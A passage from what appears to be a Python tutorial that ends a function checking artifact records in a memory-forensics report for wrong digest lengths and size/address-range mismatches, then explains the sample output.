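    return None

def check_artifact(art):
    """Findings: wrong digest lengths, unparseable sizes, size/address-range mismatches."""
    findings = ["%s has %d hex chars, expected %d" % (algo, len(d), HASH_LEN[algo])
                for algo, d in art.hashes.items() if len(d) != HASH_LEN[algo]]
    if art.size is None:
        return findings
    parsed, actual = parse_size(art.size), region_size(art.name)
    if parsed is None:
        findings.append("unparseable size %r" % art.size)
    elif actual is not None and abs(actual - parsed[0]) > parsed[1]:
        findings.append("range spans %d bytes but size is listed as %s" % (actual, art.size))
    return findings
```

Running `parse_listing(SAMPLE)` yields three Artifact records; `identify_content` labels the crashpad pipe as empty input, and `check_artifact` returns no findings for any of the three, since the 0x62E0000-0x632C000 range is exactly 304KB. Feed it the rest of the listing (or another report in the same layout) to find entries whose listed size and address span disagree, or whose digests belong to a known trivial content rather than to anything worth pivoting on.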